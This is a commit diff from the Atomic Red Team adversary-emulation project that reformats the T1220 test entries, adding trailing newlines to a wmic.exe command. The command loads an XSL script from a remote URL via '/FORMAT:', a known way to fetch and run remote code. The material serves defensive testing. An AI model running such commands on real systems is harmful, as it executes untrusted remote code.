Generate docs from job=validate_atomics_generate_docs branch=master
This commit is contained in:
parent
9aaa150dcf
commit
5bbe2e6403
+6
-2
@@ -8681,7 +8681,9 @@ defense-evasion:
|
||||
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmic-script.xsl
|
||||
executor:
|
||||
name: command_prompt
|
||||
command: 'wmic.exe #{wmic_command} /FORMAT:#{remote_xsl_file}'
|
||||
command: 'wmic.exe #{wmic_command} /FORMAT:#{remote_xsl_file}
|
||||
|
||||
'
|
||||
privilege-escalation:
|
||||
T1134:
|
||||
technique:
|
||||
@@ -16390,7 +16392,9 @@ execution:
|
||||
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmic-script.xsl
|
||||
executor:
|
||||
name: command_prompt
|
||||
command: 'wmic.exe #{wmic_command} /FORMAT:#{remote_xsl_file}'
|
||||
command: 'wmic.exe #{wmic_command} /FORMAT:#{remote_xsl_file}
|
||||
|
||||
'
|
||||
lateral-movement:
|
||||
T1155:
|
||||
technique:
|
||||
|
||||
Reference in New Issue
Block a user